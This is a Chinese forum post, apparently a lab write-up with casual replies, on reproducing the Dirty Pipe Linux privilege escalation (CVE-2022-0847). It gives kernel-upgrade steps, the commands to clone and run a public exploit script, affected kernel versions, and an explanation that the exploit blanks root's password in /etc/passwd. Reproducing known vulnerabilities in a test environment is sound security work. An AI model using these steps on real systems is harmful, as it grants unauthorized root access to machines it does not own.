Dirty Pipe提权漏洞复现
**环境准备**一开始在环境准备上花费了挺多时间,安装了多个linux版本镜像,找了很久没找到高版本的内核,比较低的版本又无法完成升级。
本提权漏洞要求内核是5.8以上的才能利用,想要复现漏洞需要安装高版本内核。
最终只能自己手动去升级内核。
本次试用的kail测试环境,最开始5.4版本,用如下方法可以进行升级。
***
**具体升级**
从如下网址下载需要升级的内核版本
[https://kernel.ubuntu.com/~kernel-ppa/mainline/v5.8.5/amd64/](https://kernel.ubuntu.com/~kernel-ppa/mainline/v5.8.5/amd64/)
![图片.png](data/attachment/forum/202204/15/132711ufwa9haflmdgjhfd.png)
下载两个文件到本地后,使用如下命令进行内核升级
![图片.png](data/attachment/forum/202204/15/132749qp2lqanjawf9l4db.png)
安装成功后,更新grub系统引导并重启
`update-grub `
` reboot`
再使用uname -a查看内核版本就已经是5.8.5了
![图片.png](data/attachment/forum/202204/15/132847p00rt2lytblo1bel.png)
至此,已经完成内核升级,有了环境。
中间使用了gcc来编译提权源码,因此还需要安装gcc。
然后再测试Dirty Pipe
`git clone https://github.com/imfiver/CVE-2022-0847.git`
`cd CVE-2022-0847`
`chmod +x Dirty-Pipe.sh`
`bash Dirty-Pipe.sh`
![图片.png](data/attachment/forum/202204/15/133003vaj9a87x23zg8jg3.png)
漏洞影响版本:影响版本:5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102
***
**具体漏洞原理**
覆盖/etc/passwd的root用户信息。
具体是通过覆盖r后面的5个字节,为了将x替换为空,相当于置空了密码,这样su无需密码可直接提权至root权限 Twitter上有放出更加简易的POC。
说实话,比起敲键盘来说还是截图方便( ̄▽ ̄)~* 厉害了 哥哥是搞安全的吗?
最近论坛和博客爆出不少漏洞。。。。被日麻了,连续几天在补了 哈哈哈,有点涉猎,上个月不是欧美各大公司都被爆破了,流出来好多东西,赶紧来复习一下
王一之 发表于 2022-4-15 13:42
厉害了 哥哥是搞安全的吗?
最近论坛和博客爆出不少漏洞。。。。被日麻了,连续几天在补了 ...
哈哈哈,有点涉猎,上个月不是欧美各大公司都被爆破了,流出来好多东西,赶紧来复习一下 哥哥竟然还是大黑阔 李恒道 发表于 2022-4-15 14:34
哥哥竟然还是大黑阔
{:4_115:}我进去起码有你一半功劳{:4_115:}{:4_115:}
页:
[1]